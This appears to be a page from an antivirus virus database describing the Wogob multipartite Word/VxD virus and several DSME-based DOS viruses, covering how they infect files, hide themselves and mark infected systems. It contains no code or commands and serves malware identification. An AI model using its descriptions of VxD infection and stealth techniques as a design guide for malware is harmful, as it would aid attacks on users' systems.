Virus Database

Wogob

Description Wogob

This is multipartite virus that infects MS Word documents and Windows95/98 VxD drivers. The virus does several steps to spread itself. When an infected document is edited by Word, the virus Word macro-program creates and executes the PE dropper (Portable Executable - the format of Win32 executable files). The PE dropper looks for VxD drivers installed in the system, and affects them. While loading the infected VxD drivers hooks file access system calls, and when Word documents are opened, infect them with virus copy.
So the virus does three steps to return back to its original state: Word document -> PE dropper -> VxD driver -> Word document. This infection mechanism looks similar to "Navrhar" multipartite virus, but realization of these viruses are different.
The virus contains the "copyright" text:
WG05 Copyright(C) 1995-1998 by WoodGoblin. With thanks to Jacky Qwerty.

From Word document to Windows memory
The infected documents have the auto-macro AutoClose that gets control when affected document is closed. First of all, the virus detects its presence in the system by the C:FUCK.YOU file. If this file presents there, the virus macro releases control. Otherwise the virus infection routine takes control. It builds the code of PE dropper (it is stored in constant strings in the virus code), writes it to a random named file with the .WG5 extension, and executes it.
The PE dropper is executed as Windows application and has the access to all necessary Windows function. It looks for VxD files that are registered in the system and infects them. The virus looks for VxD files in the System Registry in the LOCAL_MACHINESystemCurrentControlSetServicesVxD, and infect those of them, that are pointed as StaticVxD. The virus then looks for VxD references in the SYSTEM.INI file, in the [386Enh] section, in the "Device=", "Mouse=", "Display=" lines, and infects them.
While infecting the virus parses the internal VxD file formats, looks for "cave" between file sections ("objects" in terms of LE file structure), and writes its code to the cave, if it is found. As a result the virus does not increase VxD files' size while infecting them. The virus then makes necessary changes in VxD file header: increases the length of affected section and modifies relocation tables to force loader to pass control to virus entry, when infected VxD is loaded to Windows memory.
From VxD file to Word documents
While infecting VxD drivers the virus writes to there a small piece of its code - just about 100 bytes of code followed with PE dropper file name. When this code received control, it allocates a block of memory, reads from PE dropper the complete virus code to this memory, and jumps to there. The virus then hooks IFS API (file accessing calls), and stays in the Windows memory as a VxD driver.
The virus IFS API handler intercepts several functions: file opening, closing, searching and attributes get/set function. When a .DOC file is opened, the virus stores its name and infects it on file closing. The virus does not affect .DOC files on local drives, but on remote and floppy drives only.
While infecting the virus parses internal Word document binary file format, creates a macro stream and writes its macro code to there. The virus also carries the code of "Word.CAP" macro virus and in some cases infects documents with this macro virus.
Depending on the random data the virus corrupts .WAD files when they are opened.
Get/Set file attributes call is used by the virus to detect its copy already loaded into the memory. The virus just terminates attribute access calls to the FUCK.YOU file, and that means that the system is already infected.
File searching calls are used by the virus to hide infected files in the system: it skips the .WG5 files (virus PE dropper), and the system does not report them. The virus also "decreases" to the original state the infected DOC files length.

Check other viruses! Be aware! Use Antiviral Software

DSCE.Demo.2941

Description DSCE.Demo.2941

It's harmless memory resident parasitic virus. It hooks INT 21h and writes itself to the end of COM- and EXE-files that are executed. It contains the internal text string:
This is a DSCE's Demo Virus written by [P.F]

DSME-based Viruses

Description DSME-based Viruses

DSME (Dark Slayer's Mutating Engine) is a polymorphic generator like the MtE or TPE generators. It creates the decryption routine and encrypts the virus body, then the virus saves this part of code in file on infection. This generator contains the internal string: "DSME v1.0".
DSME.Apex
It's a not dangerous not memory resident parasitic virus. It searches for .COM-files and writes itself to their ends. In September it manifests itself with sound and video effects. Tt displays the text string:
My name is APEX v1.0_ Congratulations! PS:I wouldn't hurt your data.Be relax!.Ha

DSME.Connie
These are harmless memory resident parasitic polymorphic viruses. They are not linked with DSME generator but they contain DSME related polymorphic code. They look like "rough copies" of DSME generator.
These viruses hook INT 21h and write themselves at the end of COM-files are accessed. They contain the internal text strings "C:COMMAND.COM" and:
"DSME.Connie.1746": This is
Written by Dark Slayer in Keelung TAIWAN
"DSME.Connie.2708": This is Connie v2.0
Written by Dark Slayer in Keelung, Taiwan

DSME.DemoVirus
It's a harmless not memory resident parasitic DSME-based virus. It searches for .COM-files and writes itself to their ends. It contains the internal text:
This is a DemoVirus for DSME v1.0, Written by Dark Slayer in Keelung,Taiwan

DSME.Teacher
It's a harmless memory resident parasitic DSME-based virus. It hooks INT 21h and writes itself to the end of COM- and EXE-files that are executed. It contains the internal text string:
Teacher virus ( A demo virus for DSME to all teacher )

Home